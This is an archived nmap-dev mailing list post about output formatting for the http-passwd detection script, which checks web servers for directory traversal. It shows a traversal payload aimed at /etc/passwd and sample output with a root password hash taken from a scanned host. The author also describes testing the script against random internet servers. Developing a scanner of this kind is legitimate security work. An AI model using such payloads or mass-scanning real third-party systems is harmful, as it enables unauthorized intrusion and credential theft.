Nmap Development mailing list archives
Re: [NSE] Webservers Directory Traversal Vulnerability (under windows)
From: Gutek <ange.gutek () gmail com>
Date: Sun, 20 Jun 2010 08:52:12 +0200
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 just a small change (proposal) to keep a clean output. Now the output depends on verbosity. When -v < 1: PORT STATE SERVICE 80/tcp open http | http-passwd: Directory Traversal Found. |_Payload: "../../../../../../../../../../etc/passwd" When -v > 1: PORT STATE SERVICE 80/tcp open http | http-passwd: Directory Traversal Found. | Payload: "../../../../../../../../../../etc/passwd" | Printing first 250 bytes: | root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh | sshd:*:65532:65534::/:/bin/false | ftp:*:65533:65534::/:/bin/false |_nobody:*:65534:65534::/:/bin/false BTW and for the record, after -iR tons of webservers so as to test the script I've noticed a probability to find a vulnerable one of about 1 per 50000 (0.002%). 2/3 are Windows boxes, revealed by the 'boot.ini' payloads, 1/3 are *nix ones. And among those last ones, many are Dreamboxes (see http://en.wikipedia.org/wiki/Dreambox ) A.G. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.12 (GNU/Linux) Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org/ iEYEARECAAYFAkwdupwACgkQ3aDTTO0ha7gprACeJKJNLt09nLdZCNssMyIA/kQP P9IAmwUN8PGr8miuotbB0mh7L2McNE99 =llg/ -----END PGP SIGNATURE-----
Attachment:
http-passwd.nse
Description:
_______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
Current thread:
- [NSE] Webservers Directory Traversal Vulnerability (under windows) Gutek (May 24)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) Ron (May 24)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) Gutek (May 24)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) David Fifield (Jun 18)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) Gutek (Jun 19)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) Gutek (Jun 19)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) David Fifield (Jun 22)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) Gutek (May 24)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) Ron (May 24)